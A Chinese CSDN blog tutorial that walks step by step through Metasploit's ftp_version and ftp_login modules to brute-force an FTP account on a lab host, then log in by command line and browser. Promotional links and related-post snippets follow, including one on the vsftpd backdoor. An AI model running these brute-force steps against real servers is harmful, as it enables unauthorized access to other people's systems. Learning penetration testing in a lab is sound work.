网安工程师白帽黑客教你:Kali Linux渗透与FTP服务器攻防实战

已于 2024-01-05 14:31:41 修改
阅读量944 收藏 26
点赞数 21
文章标签: 服务器 linux php 网络 web安全 安全 开发语言
于 2023-12-26 09:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y525698136/article/details/135208149
版权

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络攻防干货!
3、Kali与编程每天准时更新,敬请学习和关注!

3.1 运行ftp_version 漏洞利用框架,如下图所示。
命令:run
获取到FTP Banner 如下图所示:Microsoft FTP Service\x0d\x0a
在这里插入图片描述

3.2 返回 ftp_version漏洞框架的上一层,如下图所示。
命令:back
在这里插入图片描述

3.3 检索Metasploit(msf)框架对于ftp_login的漏洞模块,如下图所示。
命令:search ftp_login
在这里插入图片描述

3.4 利用见多到的ftp_login漏洞模块,如下图所示。
命令:use auxiliary/scanner/ftp/ftp_login
在这里插入图片描述

3.5 查看ftp_login漏洞利用模块的参数,如下图所示。
命令:show options
RHOSTS:受害者主机IP
THREADS:线程数
USERNAME:FTP用户名
PASS_FILE:密码文件
在这里插入图片描述

3.6 设置RHOSTS参数,如下图所示。
命令:set rhosts 192.168.78.165

在这里插入图片描述

3.7 设置USERNAME参数,如下图所示。
命令:set username test1
在这里插入图片描述

3.8 设置PASS_FILE参数,如下图所示。
命令:set pass_file /root/pass.txt
在这里插入图片描述

3.8 设置THREADS参数,如下图所示。
命令:set threads 5
在这里插入图片描述

3.9 查看参数配置结果(参数是否配置成功),如下图所示。
命令:show options
在这里插入图片描述

3.10 执行ftp_login漏洞利用模块,如下图所示。
命令:run
如下图所示,ftp服务暴力破解成功。
在这里插入图片描述

3.11 命令行远程登录ftp服务,如下图所示。
命令:ftp IP(ftp 192.168.78.165)
在这里插入图片描述

3.12 浏览器URL栏登录FTP服务,如下图所示。
步骤:URl栏输入ftp://IP 在弹出窗口利用破解到的账户信息登录。
在这里插入图片描述

3.13 浏览器登录FTP服务成功,如下图所示。
在这里插入图片描述

​最后

为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~

😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

今天在这里吐血推荐全套《黑客&网络安全入门&进阶学习资源包》, 扫描即可获取

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

因篇幅有限,仅展示部分资料

2️⃣视频配套资料&国内外网安书籍、文档

① 文档和书籍资料

② 黑客技术

因篇幅有限,仅展示部分资料

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

3️⃣网络安全源码合集+工具包

4️⃣网络安全面试题

5️⃣汇总

所有资料 ⚡️ ,朋友们如果有需要全套 《网络安全入门+进阶学习资源包》,扫码获取~

👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈

程序学到昏
关注
  • 21
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务器渗透技术
10-08
信息收集 网站常见弱点 网络硬件入侵 WINDOWS提权 内网渗透 清理日志及做跳板 WEBSHELL查杀
FTP渗透
weixin_45383720的博客
11-12 2963
ftp:一般端口为20,21 查看ftp服务状态service vsftpd status 启动:service vsftpd start 查看进程:ps -ef|grep -i ftp Netstat -an |grep 21 如何连接ftp? ftp + ip 也可以输入ftp 进入ftp服务后open加ip 查看FTP服务器上的文件 (一般情况下用户都会被限制目录的访问权限,只可在当前目录...
Kali Linux网络攻击与防御
最新发布
Kali与编程
02-25 1026
举个例子,DNS(域名系统)服务器通常具有反射放大特性,攻击者可以伪造自己的IP地址,并发送DNS查询请求到DNS服务器,使其向目标系统发送大量的响应数据,从而使目标系统的带宽被耗尽,无法正常提供服务。举个例子,假设一个用户正在访问一个银行的网站攻击者通过中间人攻击截获用户的登录凭证,然后使用这些凭证访问用户的银行账户进行恶意活动。举个例子,假设一个银行的网站正在遭受僵尸网络攻击攻击者通过控制数千台僵尸机,向银行服务器发送大量的请求,从而导致服务器无法正常处理用户的请求,造成服务中断。
网站ftp服务器漏洞利用,网站入侵渗透综合分析和FTP提权得系统权限
weixin_32175667的博客
08-04 946
当我们想入侵检测一个网站拿后台/webshell后想进一步获得网站服务器管理权限。小残在这里为大家介绍下一下思路第一个思路:啊D+GOOGLE找注入点PS:可以通过直接在网站查看动态界面 类似于:asp?id=的动态界面进行手工查找如果没找到动态页面可以通过百度或者谷歌进行搜索网站的动态页面通过谷歌语法: 假如要查看的网站是www.*****.net 那么就可以这样搜索 site:www.***...
网络空间安全 渗透 攻防7(web服务器FTP服务器
Shany_Ming的博客
04-03 4593
第十二章 web服务器 一.web服务器 web服务器也叫网页服务器或http服务器 二.web服务器使用协议 web服务器使用的协议是HTTP或HTTPS 三.web服务器的协议端口号 HTTP协议端口号:TCP 80 HTTPS协议端口号:TCP 443 四.web服务器发布的软件 微软:IIS(可以发布web网站和FTP站点) Linux:Apache/LAMP/Tomcat/nginx.etc 以上适合生产所用 第三方:phpstudy,XAMPP
一起了解FTP渗透
课嗨教育的专栏
10-02 924
Ftp笑脸漏洞, 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。首先是弱口令,弱口令作为渗透突破中的一大要点,在实战中常见的弱口令也是不少的,如企业开放与互联网边界的设备或系统,VPN设备,虚拟化桌面,邮件等系统,弱口令是一个必不可少的测试阶段。账户anonymous。
kali linux安全渗透程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防渗透测试等
KaliLinux安全渗透程(完整版)
04-26
第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
基于树莓派Kali Linux渗透测试基础程,网络安全,计算机,黑客
03-13
树莓派kali linux程 树莓派,(英语:Raspberry Pi,简写为RPi,别名为RasPi / RPI) [1] 是为学习计算机编程育而设计,只有信用卡大小的微型电脑,其系统基于Linux。随着Windows 10 IoT的发布,用户可以用上...
Kali Linux 安全渗透
06-13
Kali Linux 安全渗透
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
Kali Linux无线渗透工具集程WiFi篇.pdf
05-20
Kali Linux无线渗透工具集程WiFi篇.pdf
kalitools:Kali Linux工具清单
02-03
kalitools:Kali Linux工具清单
kali_linux渗透测试视频程(10套程).txt
04-06
10套独家渗透测试视频程,熟练掌握Kali_Linux及metasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战材一套,metasploit渗透测试魔鬼训练营材一套。
Kali Linux 安全渗透程.pdf
05-12
彩色版PDF 489页 大学霸
入门渗透:FTP入侵——Fawn
栉风沐雪的博客
01-31 1666
入门渗透:FTP入侵——Fawn,使用的是hackthebox靶机。小技巧:可以通过搜索引擎查找csftpd 3.0.3出现的CVE漏洞等,一般最新的服务漏洞不会曝光,但是如果不是最新版本,可以查找相关的漏洞,使用msf的模块进行渗透。遇到没有进行加密的ftp一般运行于21端口,此处靶机为简单的ftp服务。使用的是hackthebox的Fawn靶机。
系统漏洞利用学习-2-kali-通过ftp上传文件至Windows,并且设置开机启动
yingaogui的博客
03-24 1933
前言: 上篇中已告知存在漏洞并且已经进入Windows系统目录;本次主要是通过FTP将文件/恶意进程传入操作系统并且加入启动项中; 测试环境 环境: Windows 7 ms17-010 已经进入系统目录 kali-Linuxftp服务器 测试步骤 kali上搭建FTP服务器 安装FTP服务 sudo apt-get install vsftpd sudo /etc/init.d/vs...
攻击机和靶机的使用说明:kali linux和OWAS详细使用程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
kali linux渗透
02-01
Kali Linux是一个基于Debian的Linux发行版,被广泛用于渗透测试和网络安全评估。它提供了一整套工具,用于测试系统的漏洞和弱点,以及对系统进行渗透攻击。 首先,为了学习Kali Linux渗透程,你需要对基本的Linux命令和操作系统有一定的了解。你可以通过阅读相关的Linux入门程或参加在线课程来获得这些基础知识。 一旦你熟悉了Linux基础知识,你可以开始学习Kali Linux中的渗透测试工具。Kali Linux提供了许多常用的渗透工具,包括Nmap、Metasploit、Wireshark等。你可以通过查阅Kali Linux官方文档或在网络上寻找相关的程来学习这些工具的使用方法。 在学习渗透测试工具之前,你还需要了解一些渗透测试的基础知识。这包括网络协议、漏洞分类、攻击向量等。你可以通过阅读相关的网络安全书籍或参加网络安全培训课程来学习这些知识。 一旦你掌握了基本的渗透测试知识和Kali Linux中的工具使用方法,你可以开始实践渗透测试。但在进行实际的渗透测试之前,请务必获得明确的授权,遵循道德和法律的原则。 总之,学习Kali Linux渗透程需要一定的Linux网络安全基础,并需要对渗透测试的道德和法律要求有一定的了解。通过学习相关的程和实践,你可以逐步提升你的渗透测试技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值